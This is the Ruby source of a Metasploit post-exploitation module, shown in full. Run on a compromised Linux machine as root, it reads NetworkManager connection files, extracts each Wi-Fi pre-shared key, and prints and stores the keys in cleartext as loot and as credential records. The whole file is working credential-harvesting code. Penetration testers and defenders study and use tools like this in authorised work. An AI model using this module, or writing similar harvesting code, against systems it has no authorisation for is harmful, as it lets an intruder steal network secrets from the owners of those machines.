GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/enum_psk.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module for Linux sessions: walks the NetworkManager connection
# directory, pulls the `psk=` value out of each file and records the results.
#
# Data handling: every recovered key leaves this module in cleartext, in the
# console table, in a CSV loot entry and in one credential record per row.
#
# Scope: only keys that appear in a file as a line beginning with `psk=` are
# seen. NOTE(review): connections whose secret is not written to the file
# (presumably agent-owned secrets) would have no such line; confirm against
# the NetworkManager keyfile documentation.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Auxiliary::Report

  # Registers the module metadata and the DIR option.
  #
  # @param info [Hash] metadata overrides, merged through update_info
  def initialize(info = {})
    metadata = update_info(
      info,
      'Name' => 'Linux Gather NetworkManager 802-11-Wireless-Security Credentials',
      'Description' => %q{
        This module collects 802-11-Wireless-Security credentials such as
        Access-Point name and Pre-Shared-Key from Linux NetworkManager
        connection configuration files.
      },
      'License' => MSF_LICENSE,
      'Author' => ['Cenk Kalpakoglu'],
      'Platform' => ['linux'],
      'SessionTypes' => ['shell', 'meterpreter'],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [],
        'SideEffects' => []
      }
    )
    super(metadata)

    # DIR is required; its default is the system-wide connection directory.
    dir_option = OptString.new(
      'DIR',
      [true, 'The path for NetworkManager configuration files', '/etc/NetworkManager/system-connections/']
    )
    register_options([dir_option])
  end

  # @return [String] the operator-supplied DIR option
  def connections_directory
    datastore['DIR']
  end

  # Reads one connection file and returns the first usable `psk=` value.
  #
  # A line qualifies when it begins with `psk=`; the value taken is the second
  # '='-separated field of that line, stripped of surrounding whitespace.
  # Lines whose value is blank are skipped and the scan continues.
  #
  # @param path [String] path of the file to read on the session
  # @return [String, nil] the value found, or nil when the path is blank, the
  #   file is empty or unreadable, or no line yields a non-blank value
  def extract_psk_from_file(path)
    return nil if path.blank?

    print_status("Reading file #{path}")
    contents = read_file(path)
    return nil if contents.blank?

    # Lazy chain: lines are examined one at a time and the scan stops at the
    # first non-blank value, like an early return inside a loop.
    contents.each_line
            .lazy
            .select { |line| line.starts_with?('psk=') }
            .map { |line| line.split('=')[1].strip }
            .find { |value| !value.blank? }
  end

  # Module entry point.
  #
  # Stops with Failure::NoAccess unless is_root? reports a root session, then
  # lists the connection directory, extracts a key from each entry and, when
  # at least one key was found, prints the table, stores it as CSV loot and
  # creates one credential per row (file name as username, key as password).
  #
  # @return [void]
  def run
    fail_with(Failure::NoAccess, 'You must run this module as root!') unless is_root?

    entries = dir(connections_directory)

    if entries.blank?
      print_status('No network connections found')
      return
    end

    table_options = {
      'Header' => '802-11-wireless-security',
      'Columns' => ['AccessPoint-Name', 'PSK'],
      'Indent' => 1
    }
    table = Rex::Text::Table.new(table_options)

    # The directory entry name doubles as the access-point name in the table.
    entries.each do |entry|
      key = extract_psk_from_file("#{connections_directory}/#{entry}")
      next if key.blank?

      table << [entry, key]
    end

    if table.rows.empty?
      print_status('No wireless PSKs found')
      return
    end

    # From here on the keys are written out in cleartext: console first,
    # then loot, then the credential store.
    print_line("\n#{table}")

    loot_path = store_loot('linux.psk.creds', 'text/csv', session, table.to_csv, 'wireless_credentials.txt')
    print_good("Credentials stored in: #{loot_path}")

    table.rows.each do |ap_name, key|
      create_credential(
        workspace_id: myworkspace_id,
        origin_type: :session,
        address: session.session_host,
        session_id: session_db_id,
        post_reference_name: refname,
        username: ap_name,
        private_data: key,
        private_type: :password
      )
    end
  end
end